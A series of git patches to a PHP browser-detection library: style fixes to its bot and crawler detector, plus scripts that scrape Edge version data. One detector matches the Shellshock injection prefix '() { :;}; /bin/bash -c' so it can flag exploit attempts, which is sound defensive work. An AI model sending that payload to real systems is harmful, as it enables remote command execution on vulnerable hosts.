) { $scriptedAgent = new ScriptedAgent($ua); - if ($scriptedAgent->getName()==ScriptedAgent::UNKNOWN) - { + if ($scriptedAgent->getName()==ScriptedAgent::UNKNOWN) { return false; - } - else - { + } else { return $scriptedAgent; } - } - else - { + } else { return false; } } /** * @param bool $isChromeFrame - * * @return $this */ public function setIsChromeFrame($isChromeFrame) { $this->isChromeFrame = (bool)$isChromeFrame; - return $this; } @@ -270,14 +256,12 @@ public function isChromeFrame() } /** - * @param bool $isChromeFrame - * + * @param bool $isWebkit * @return $this */ public function setIsWebkit($isWebkit) { $this->isWebkit = (bool)$isWebkit; - return $this; } @@ -305,13 +289,11 @@ public function isWebkit() /** * @param bool $isFacebookWebView - * * @return $this */ public function setIsFacebookWebView($isFacebookWebView) { $this->isFacebookWebView = (bool) $isFacebookWebView; - return $this; } @@ -339,13 +321,11 @@ public function isFacebookWebView() /** * @param bool $isTwitterWebView - * * @return $this */ public function setIsTwitterWebView($isTwitterWebView) { $this->isTwitterWebView = (bool) $isTwitterWebView; - return $this; } @@ -373,13 +353,11 @@ public function isTwitterWebView() /** * @param UserAgent $userAgent - * * @return $this */ public function setUserAgent(UserAgent $userAgent) { $this->userAgent = $userAgent; - return $this; } @@ -399,7 +377,6 @@ public function getUserAgent() public function setIsCompatibilityMode($isCompatibilityMode) { $this->isCompatibilityMode = $isCompatibilityMode; - return $this; } diff --git a/src/BrowserDetector.php b/src/BrowserDetector.php index fb54500..7de2ab0 100644 --- a/src/BrowserDetector.php +++ b/src/BrowserDetector.php @@ -236,8 +236,6 @@ public static function checkTwitterWebView() return false; } - - /** * Determine if the user is using a BlackBerry. * diff --git a/src/ScriptedAgentDetector.php b/src/ScriptedAgentDetector.php index 2cd6d84..220c3d6 100644 --- a/src/ScriptedAgentDetector.php +++ b/src/ScriptedAgentDetector.php @@ -55,7 +55,7 @@ class ScriptedAgentDetector implements DetectorInterface ); /** - * Routine to determine the browser type. + * Routine to determine the scripted agent type. * * @param ScriptedAgent $scriptedAgent * @param UserAgent $userAgent @@ -110,8 +110,7 @@ public static function checkRobotICQ() { //Chrome 51 always provides the Upgrade-Insecure-Requests header. ICQ does not. //But to be extra safe, also check for the russian language which the ICQ bot sets. - if (stripos(self::$userAgentString, 'Chrome/51.0.2704.103') !== FALSE && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== FALSE) - { + if (stripos(self::$userAgentString, 'Chrome/51.0.2704.103') !== false && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== false) { self::$scriptedAgent->setName(ScriptedAgent::ICQ); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://icq.com"); @@ -127,8 +126,7 @@ public static function checkRobotICQ() */ public static function checkRobotGoogle() { - if (stripos(self::$userAgentString, "Googlebot") !== false) - { + if (stripos(self::$userAgentString, "Googlebot") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEBOT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); @@ -138,22 +136,19 @@ public static function checkRobotGoogle() || stripos(self::$userAgentString, "Mediapartners-Google") !== false || stripos(self::$userAgentString, "Google-Adwords") !== false || stripos(self::$userAgentString, "AdXVastFetcher-Google") !== false - ) - { + ) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEADS); self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); return true; } - if (stripos(self::$userAgentString, "Google Favicon") !== false) - { + if (stripos(self::$userAgentString, "Google Favicon") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEFAVICON); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4626518.htm"); return true; } - if (stripos(self::$userAgentString, "Google Web Preview") !== false) - { + if (stripos(self::$userAgentString, "Google Web Preview") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOOGLEPREVIEW); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://www.distilnetworks.com/bot-directory/bot/google-web-preview/"); @@ -169,8 +164,7 @@ public static function checkRobotGoogle() */ public static function checkRobotBaidu() { - if (stripos(self::$userAgentString, "Baiduspider") !== false) - { + if (stripos(self::$userAgentString, "Baiduspider") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BAIDU); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); @@ -186,8 +180,7 @@ public static function checkRobotBaidu() */ public static function checkRobotFacebook() { - if (stripos(self::$userAgentString, "facebookexternalhit") !== false) - { + if (stripos(self::$userAgentString, "facebookexternalhit") !== false) { self::$scriptedAgent->setName(ScriptedAgent::FACEBOOK); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://www.facebook.com/externalhit_uatext.php"); @@ -203,30 +196,25 @@ public static function checkRobotFacebook() */ public static function checkRobotBing() { - - if (stripos(self::$userAgentString, "adidxbot/") !== false) - { + if (stripos(self::$userAgentString, "adidxbot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BING); self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); return true; } - if (stripos(self::$userAgentString, "/bingbot.htm") !== false) - { + if (stripos(self::$userAgentString, "/bingbot.htm") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BING); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); return true; } - if (stripos(self::$userAgentString, "/msnbot.htm") !== false) - { + if (stripos(self::$userAgentString, "/msnbot.htm") !== false) { self::$scriptedAgent->setName(ScriptedAgent::MSNBOT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); return true; } - if (stripos(self::$userAgentString, "BingPreview/") !== false) - { + if (stripos(self::$userAgentString, "BingPreview/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BING_PREVIEW); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); @@ -243,8 +231,7 @@ public static function checkRobotBing() */ public static function checkRobotSlurp() { - if (stripos(self::$userAgentString, "Yahoo! Slurp") !== false) - { + if (stripos(self::$userAgentString, "Yahoo! Slurp") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SLURP); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://help.yahoo.com/kb/SLN22600.html"); @@ -260,8 +247,7 @@ public static function checkRobotSlurp() */ public static function checkRobotTwitter() { - if (stripos(self::$userAgentString, "Twitterbot/") !== false) - { + if (stripos(self::$userAgentString, "Twitterbot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::TWITTER); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("http://stackoverflow.com/questions/22362215/twitter-user-agent-on-sharing"); @@ -277,8 +263,7 @@ public static function checkRobotTwitter() */ public static function checkRobotSkype() { - if (stripos(self::$userAgentString, "SkypeUriPreview") !== false) - { + if (stripos(self::$userAgentString, "SkypeUriPreview") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SKYPE); self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); self::$scriptedAgent->setInfoURL("http://www.skype.com"); @@ -301,16 +286,14 @@ public static function checkRobotW3CValidator() stripos(self::$userAgentString, "FeedValidator/") !== false || stripos(self::$userAgentString, "Jigsaw/") !== false || stripos(self::$userAgentString, "JW3C_Unicorn/") !== false - ) - { + ) { self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); return true; } if (stripos(self::$userAgentString, "NING/") !== false || - stripos(self::$userAgentString, "W3C-checklink") !== false) - { + stripos(self::$userAgentString, "W3C-checklink") !== false) { self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); @@ -326,8 +309,7 @@ public static function checkRobotW3CValidator() */ public static function checkRobotYandex() { - if (stripos(self::$userAgentString, "YandexBot/") !== false) - { + if (stripos(self::$userAgentString, "YandexBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::YANDEX); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://yandex.com/bots"); @@ -343,8 +325,7 @@ public static function checkRobotYandex() */ public static function checkRobotApple() { - if (stripos(self::$userAgentString, "AppleBot/") !== false) - { + if (stripos(self::$userAgentString, "AppleBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::APPLEBOT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.apple.com/en-gb/HT204683"); @@ -360,8 +341,7 @@ public static function checkRobotApple() */ public static function checkRobotPaperli() { - if (stripos(self::$userAgentString, "PaperLiBot/") !== false) - { + if (stripos(self::$userAgentString, "PaperLiBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PAPERLI); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://support.paper.li/hc/en-us/articles/204105253-What-is-Paper-li-"); @@ -377,8 +357,7 @@ public static function checkRobotPaperli() */ public static function checkRobotAhrefs() { - if (stripos(self::$userAgentString, "AhrefsBot/") !== false) - { + if (stripos(self::$userAgentString, "AhrefsBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::AHREFS); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://ahrefs.com/robot"); @@ -394,8 +373,7 @@ public static function checkRobotAhrefs() */ public static function checkRobotMJ12() { - if (stripos(self::$userAgentString, "MJ12Bot/") !== false) - { + if (stripos(self::$userAgentString, "MJ12Bot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::MJ12); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://www.majestic12.co.uk/projects/dsearch/mj12bot.php"); @@ -411,8 +389,7 @@ public static function checkRobotMJ12() */ public static function checkRobotLiveLap() { - if (stripos(self::$userAgentString, "LivelapBot/") !== false) - { + if (stripos(self::$userAgentString, "LivelapBot/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::LIVELAP); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://site.livelap.com/crawler.html"); @@ -429,8 +406,7 @@ public static function checkRobotLiveLap() public static function checkRobotWebdav() { if (stripos(self::$userAgentString, "WEBDAV Client") !== false || - stripos(self::$userAgentString, "Microsoft Office Existence Discovery") !== false) //Office Webdav probe - { + stripos(self::$userAgentString, "Microsoft Office Existence Discovery") !== false) { //Office Webdav probe self::$scriptedAgent->setName(ScriptedAgent::WEBDAV); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://en.wikipedia.org/wiki/WebDAV"); @@ -446,8 +422,7 @@ public static function checkRobotWebdav() */ public static function checkRobotMetaURI() { - if (stripos(self::$userAgentString, "MetaURI API/") !== false) - { + if (stripos(self::$userAgentString, "MetaURI API/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::METAURI); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://github.com/stateless-systems/uri-meta"); @@ -463,8 +438,7 @@ public static function checkRobotMetaURI() */ public static function checkRobotTLSProbe() { - if (stripos(self::$userAgentString, "TLSProbe/") !== false) - { + if (stripos(self::$userAgentString, "TLSProbe/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::TLSPROBE); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://bitbucket.org/marco-bellaccini/tlsprobe"); @@ -481,8 +455,7 @@ public static function checkRobotTLSProbe() public static function checkRobotScoopIt() { if (stripos(self::$userAgentString, "wpif Safari") !== false - || stripos(self::$userAgentString, "imgsizer Safari") !== false) - { + || stripos(self::$userAgentString, "imgsizer Safari") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SCOOPIT); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4785385.htm"); @@ -498,8 +471,7 @@ public static function checkRobotScoopIt() */ public static function checkRobotNetcraft() { - if (stripos(self::$userAgentString, "Netcraft SSL Server Survey") !== false) - { + if (stripos(self::$userAgentString, "Netcraft SSL Server Survey") !== false) { self::$scriptedAgent->setName(ScriptedAgent::NETCRAFT); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://www.netcraft.com/internet-data-mining/ssl-survey/"); @@ -515,8 +487,7 @@ public static function checkRobotNetcraft() */ public static function checkRobotCurl() { - if (stripos(self::$userAgentString, "curl/") !== false) - { + if (stripos(self::$userAgentString, "curl/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::CURL); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://curl.haxx.se/"); @@ -533,8 +504,7 @@ public static function checkRobotCurl() public static function checkRobotPython() { if (stripos(self::$userAgentString, "python-requests/") !== false || - stripos(self::$userAgentString, "python-urllib/") !== false) - { + stripos(self::$userAgentString, "python-urllib/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PYTHON); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.python.org/"); @@ -550,8 +520,7 @@ public static function checkRobotPython() */ public static function checkRobotGoLang() { - if (stripos(self::$userAgentString, "Go-http-client") !== false) - { + if (stripos(self::$userAgentString, "Go-http-client") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GOLANG); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://golang.org/"); @@ -567,8 +536,7 @@ public static function checkRobotGoLang() */ public static function checkRobotPerl() { - if (stripos(self::$userAgentString, "libwww-perl/") !== false) - { + if (stripos(self::$userAgentString, "libwww-perl/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PERL); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.perl.org/"); @@ -584,8 +552,7 @@ public static function checkRobotPerl() */ public static function checkRobotWget() { - if (stripos(self::$userAgentString, "Wget/") !== false) - { + if (stripos(self::$userAgentString, "Wget/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::WGET); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://www.gnu.org/software/wget/"); @@ -601,8 +568,7 @@ public static function checkRobotWget() */ public static function checkRobotZGrab() { - if (stripos(self::$userAgentString, "zgrab/") !== false) - { + if (stripos(self::$userAgentString, "zgrab/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::ZGRAB); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://github.com/zmap/zgrab"); @@ -618,8 +584,7 @@ public static function checkRobotZGrab() */ public static function checkRobotJava() { - if (stripos(self::$userAgentString, "Java/") !== false) - { + if (stripos(self::$userAgentString, "Java/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::JAVA); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.java.com/en/"); @@ -635,8 +600,7 @@ public static function checkRobotJava() */ public static function checkRobotShellshock() { - if (stripos(self::$userAgentString, "() { :;}; /bin/bash -c") !== false) - { + if (stripos(self::$userAgentString, "() { :;}; /bin/bash -c") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SHELLSHOCK); self::$scriptedAgent->setType(ScriptedAgent::EXPLOIT); self::$scriptedAgent->setInfoURL("https://blog.cloudflare.com/inside-shellshock/"); @@ -652,8 +616,7 @@ public static function checkRobotShellshock() */ public static function checkRobotBrowershots() { - if (stripos(self::$userAgentString, "Browsershots") !== false) - { + if (stripos(self::$userAgentString, "Browsershots") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BROWSERSHOTS); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://browsershots.org/"); @@ -669,8 +632,7 @@ public static function checkRobotBrowershots() */ public static function checkRobotWhois() { - if (stripos(self::$userAgentString, "who.is bot") !== false) - { + if (stripos(self::$userAgentString, "who.is bot") !== false) { self::$scriptedAgent->setName(ScriptedAgent::WHOIS); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://www.who.is/"); @@ -686,8 +648,7 @@ public static function checkRobotWhois() */ public static function checkRobotMageReport() { - if (stripos(self::$userAgentString, "MageReport") !== false) - { + if (stripos(self::$userAgentString, "MageReport") !== false) { self::$scriptedAgent->setName(ScriptedAgent::MAGEREPORT); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://www.magereport.com/"); @@ -703,8 +664,7 @@ public static function checkRobotMageReport() */ public static function checkRobotAdbeat() { - if (stripos(self::$userAgentString, "adbeat.com") !== false) - { + if (stripos(self::$userAgentString, "adbeat.com") !== false) { self::$scriptedAgent->setName(ScriptedAgent::ADBEAT); self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); self::$scriptedAgent->setInfoURL("https://www.adbeat.com/operation_policy"); @@ -720,8 +680,7 @@ public static function checkRobotAdbeat() */ public static function checkRobotSocialrank() { - if (stripos(self::$userAgentString, "SocialRankIOBot") !== false) - { + if (stripos(self::$userAgentString, "SocialRankIOBot") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SOCIALRANK); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://socialrank.io/about"); @@ -737,8 +696,7 @@ public static function checkRobotSocialrank() */ public static function checkRobotGlutenFree() { - if (stripos(self::$userAgentString, "Gluten Free Crawler/") !== false) - { + if (stripos(self::$userAgentString, "Gluten Free Crawler/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GLUTENFREE); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://glutenfreepleasure.com/"); @@ -754,8 +712,7 @@ public static function checkRobotGlutenFree() */ public static function checkRobotProximic() { - if (stripos(self::$userAgentString, "proximic;") !== false) - { + if (stripos(self::$userAgentString, "proximic;") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PROXIMIC); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://www.proximic.com/info/spider.php"); @@ -771,8 +728,7 @@ public static function checkRobotProximic() */ public static function checkRobotUbermetrics() { - if (stripos(self::$userAgentString, "@ubermetrics-technologies.com") !== false) - { + if (stripos(self::$userAgentString, "@ubermetrics-technologies.com") !== false) { self::$scriptedAgent->setName(ScriptedAgent::UBERMETRICS); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://www.ubermetrics-technologies.com/"); @@ -788,8 +744,7 @@ public static function checkRobotUbermetrics() */ public static function checkRobotVerisign() { - if (stripos(self::$userAgentString, "ips-agent") !== false) - { + if (stripos(self::$userAgentString, "ips-agent") !== false) { self::$scriptedAgent->setName(ScriptedAgent::VERISIGN); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://www.spambotsecurity.com/forum/viewtopic.php?f=7&t=1453"); From 910f635e2b87d1a6d6028e4620e62f6d0e5f5f32 Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Tue, 11 Apr 2017 23:28:38 -0400 Subject: [PATCH 15/19] Added script to fetch latests edge versions from ChangeWindows --- .gitattributes | 1 + scripts/fetchEdgeVersions/ChangeWindows.php | 136 ++++++++++++++++++ scripts/fetchEdgeVersions/Wikipedia.php | 0 scripts/fetchEdgeVersions/index.php | 2 + .../fetchEdgeVersions/windowsVersions.json | 29 ++++ src/edgeVersionMap.php | 8 ++ 6 files changed, 176 insertions(+) create mode 100644 scripts/fetchEdgeVersions/ChangeWindows.php create mode 100644 scripts/fetchEdgeVersions/Wikipedia.php create mode 100644 scripts/fetchEdgeVersions/index.php create mode 100644 scripts/fetchEdgeVersions/windowsVersions.json create mode 100644 src/edgeVersionMap.php diff --git a/.gitattributes b/.gitattributes index 5b67882..b8faf42 100644 --- a/.gitattributes +++ b/.gitattributes @@ -12,3 +12,4 @@ /phpunit.xml.dist export-ignore /README.md export-ignore /ruleset.xml export-ignore +/scripts export-ignore diff --git a/scripts/fetchEdgeVersions/ChangeWindows.php b/scripts/fetchEdgeVersions/ChangeWindows.php new file mode 100644 index 0000000..6f43cdc --- /dev/null +++ b/scripts/fetchEdgeVersions/ChangeWindows.php @@ -0,0 +1,136 @@ + 'Could not fetch current version from ChangeWindows', + 'invalid_version' => 'Windows version is invalid', + 'could_not_fetch_page' => 'Could not fetch page from ChangeWindows' + ); + + public static function fetchVersions() + { + $windowsVersions = json_decode(file_get_contents(__DIR__ . '/windowsVersions.json'), true); + if (!count($windowsVersions)) { + $currentVersion = explode('.', self::fetchCurrentVersion(), 2); + if (!isset($currentVersion[0])) throw new Exception(self::$errors['invalid_version']); + $windowsVersions = self::fetchVersion($windowsVersions, $currentVersion[0]); + self::writeWindowsVersions($windowsVersions); + } else { + reset($windowsVersions); + $firstVersion = key($windowsVersions); + end($windowsVersions); + $lastVersion = key($windowsVersions); + + try { + $result = self::fetchVersion($windowsVersions, $firstVersion); + $windowsVersions = $result; + } catch (Exception $e) { + } + + $windowsVersions = self::fetchVersion($windowsVersions, $lastVersion); + self::writeWindowsVersions($windowsVersions); + } + } + + private static function fetchVersion($windowsVersions, $version) + { + $siblingVersions = self::fetchPage($version); + $windowsVersions[$version] = true; + self::writeWindowsVersions($windowsVersions); + + if (isset($siblingVersions[0]) && !isset($windowsVersions[$siblingVersions[0]])) { + $windowsVersions = self::fetchVersion($windowsVersions, $siblingVersions[0]); + } + + if (isset($siblingVersions[1]) && !isset($windowsVersions[$siblingVersions[1]])) { + $windowsVersions = self::fetchVersion($windowsVersions, $siblingVersions[1]); + } + + return $windowsVersions; + } + + private static function writeWindowsVersions($windowsVersions) + { + ksort($windowsVersions); + file_put_contents(__DIR__ . '/windowsVersions.json', json_encode($windowsVersions, JSON_PRETTY_PRINT)); + } + + private static function fetchCurrentVersion() + { + $content = file_get_contents('https://changewindows.org/filter/pc/all/current/month/true'); + if (!$content) throw new Exception(self::$errors['could_not_fetch_version']); + $content = explode('class="timeline"', $content, 2); + if (!isset($content[1])) throw new Exception(self::$errors['could_not_fetch_version']); + $content = explode('build"', $content[1], 2); + if (!isset($content[1])) throw new Exception(self::$errors['could_not_fetch_version']); + preg_match("/(\d*\.\d*)<\/div>/", $content[1], $matches); + if (!isset($matches[1])) throw new Exception(self::$errors['could_not_fetch_version']); + return $matches[1]; + } + + private static function fetchPage($version) + { + $url = "https://changewindows.org/build/{$version}/pc"; + $content = file_get_contents($url); + $siblingVersions = self::fetchSiblingVersions($content); + self::fetchEdgeVersion($content); + return $siblingVersions; + } + + private static function fetchEdgeVersion($content) + { + preg_match('/]*> *Edge ([\d\.]*) *<\/h4>/', $content, $edge); + preg_match('/]*>EdgeHTML ([\d\.]*)<\/h4>/', $content, $edgeHtml); + + if (isset($edge[1]) && isset($edgeHtml[1])) { + self::writeEdgeVersion($edgeHtml[1], $edge[1]); + } + return null; + } + + private static function writeEdgeVersion($edgeHtml, $edge) + { + $file = __DIR__ . '/../../src/edgeVersionMap.php'; + $currentVersions = require $file; + if (!isset($currentVersions[$edgeHtml])) { + $currentVersions[$edgeHtml] = $edge; + ksort($currentVersions); + $content = ''; + foreach ($currentVersions as $edgeHtml => $edge) { + $content .= " '{$edgeHtml}' => '{$edge}'," . PHP_EOL; + } + $data = << *(\d+) * '39.15002', + '15.15007' => '39.15007', + '15.15019' => '40.15019', + '15.15063' => '40.15063', +); From d853bbc5e83a58ab48da397bedea828589fe24a3 Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Wed, 12 Apr 2017 09:03:20 -0400 Subject: [PATCH 16/19] Added wikipedia as edge versions source --- scripts/fetchEdgeVersions/Wikipedia.php | 65 +++++++++++++++++++++++++ scripts/fetchEdgeVersions/index.php | 5 ++ src/edgeVersionMap.php | 62 +++++++++++++++++++++++ 3 files changed, 132 insertions(+) diff --git a/scripts/fetchEdgeVersions/Wikipedia.php b/scripts/fetchEdgeVersions/Wikipedia.php index e69de29..9f7278f 100644 --- a/scripts/fetchEdgeVersions/Wikipedia.php +++ b/scripts/fetchEdgeVersions/Wikipedia.php @@ -0,0 +1,65 @@ + 'Unable to fetch content', + 'parse_error' => 'Unable to parse content', + ); + + public static function fetch() + { + $content = file_get_contents(self::URL); + if (!$content) throw new Exception(self::$errors['fetch_error']); + $content = explode('===Release history===', $content); + if (!isset($content[1])) throw new Exception(self::$errors['parse_error']); + $table = explode('|-', $content[1]); + if (!isset($table[1])) throw new Exception(self::$errors['parse_error']); + $table = array_slice($table, 1); + $versions = array_map(array('Wikipedia', 'extractVersion'), $table); + self::writeEdgeVersions($versions); + } + + private static function extractVersion($content) + { + $lines = array_slice(array_filter( + explode(PHP_EOL, $content), + function ($val) { return trim($val) && strpos($val, '|') === 0; } + ), 0, 2); + + preg_match("/{[^}{]*Version[^}{]*\| ?([\d\.]+)}/", $lines[0], $edgeVersion); + preg_match("/\| *(\d*\.\d*)/", $lines[1], $edgeHtmlVersion); + + if (!isset($edgeVersion[1])) throw new Exception(self::$errors['parse_error']); + if (!isset($edgeHtmlVersion[1])) throw new Exception(self::$errors['parse_error']); + + return array($edgeHtmlVersion[1], $edgeVersion[1]); + } + + private static function writeEdgeVersions($versions) + { + $file = __DIR__ . '/../../src/edgeVersionMap.php'; + $currentVersions = require $file; + + foreach ($versions as $version) { + $currentVersions[$version[0]] = $version[1]; + } + ksort($currentVersions); + + $content = ''; + foreach ($currentVersions as $edgeHtml => $edge) { + $content .= " '{$edgeHtml}' => '{$edge}'," . PHP_EOL; + } + $data = << '0.10.10049', + '12.10051' => '0.11.10051', + '12.10052' => '0.11.10052', + '12.10061' => '0.11.10061', + '12.10074' => '0.11.10074', + '12.10080' => '0.11.10080', + '12.10122' => '13.10122', + '12.10130' => '15.10130', + '12.10136' => '16.10136', + '12.10149' => '19.10149', + '12.10158' => '20.10158', + '12.10159' => '20.10159', + '12.10162' => '20.10162', + '12.10166' => '20.10166', + '12.10240' => '20.10240', + '12.10512' => '20.10512', + '12.10514' => '20.10514', + '12.10525' => '20.10525', + '12.10532' => '20.10532', + '12.10536' => '20.10536', + '13.10547' => '21.10547', + '13.10549' => '21.10549', + '13.10565' => '23.10565', + '13.10572' => '25.10572', + '13.10576' => '25.10576', + '13.10581' => '25.10581', + '13.10586' => '25.10586', + '13.11082' => '25.11082', + '13.11099' => '27.11099', + '13.11102' => '28.11102', + '13.14251' => '28.14251', + '13.14257' => '28.14257', + '14.14267' => '31.14267', + '14.14271' => '31.14271', + '14.14279' => '31.14279', + '14.14283' => '31.14283', + '14.14291' => '34.14291', + '14.14295' => '34.14295', + '14.14300' => '34.14300', + '14.14316' => '37.14316', + '14.14322' => '37.14322', + '14.14327' => '37.14327', + '14.14328' => '37.14328', + '14.14332' => '37.14332', + '14.14342' => '38.14342', + '14.14352' => '38.14352', + '14.14393' => '38.14393', + '14.14901' => '39.14901', + '14.14905' => '39.14905', + '14.14915' => '39.14915', + '14.14926' => '39.14926', + '14.14931' => '39.14931', + '14.14936' => '39.14936', + '15.14942' => '39.14942', + '15.14946' => '39.14946', + '15.14951' => '39.14951', + '15.14955' => '39.14955', + '15.14959' => '39.14959', + '15.14965' => '39.14965', + '15.14971' => '39.14971', + '15.14977' => '39.14977', + '15.14986' => '39.14986', '15.15002' => '39.15002', '15.15007' => '39.15007', '15.15019' => '40.15019', From f567a240093bcdf78198119ed52fdbb376c862a7 Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Wed, 12 Apr 2017 09:05:08 -0400 Subject: [PATCH 17/19] Fixed styling --- scripts/fetchEdgeVersions/ChangeWindows.php | 40 +++++++++++++++------ scripts/fetchEdgeVersions/Wikipedia.php | 24 +++++++++---- src/BrowserDetector.php | 14 +++----- 3 files changed, 52 insertions(+), 26 deletions(-) diff --git a/scripts/fetchEdgeVersions/ChangeWindows.php b/scripts/fetchEdgeVersions/ChangeWindows.php index 6f43cdc..864e592 100644 --- a/scripts/fetchEdgeVersions/ChangeWindows.php +++ b/scripts/fetchEdgeVersions/ChangeWindows.php @@ -21,7 +21,9 @@ public static function fetchVersions() $windowsVersions = json_decode(file_get_contents(__DIR__ . '/windowsVersions.json'), true); if (!count($windowsVersions)) { $currentVersion = explode('.', self::fetchCurrentVersion(), 2); - if (!isset($currentVersion[0])) throw new Exception(self::$errors['invalid_version']); + if (!isset($currentVersion[0])) { + throw new Exception(self::$errors['invalid_version']); + } $windowsVersions = self::fetchVersion($windowsVersions, $currentVersion[0]); 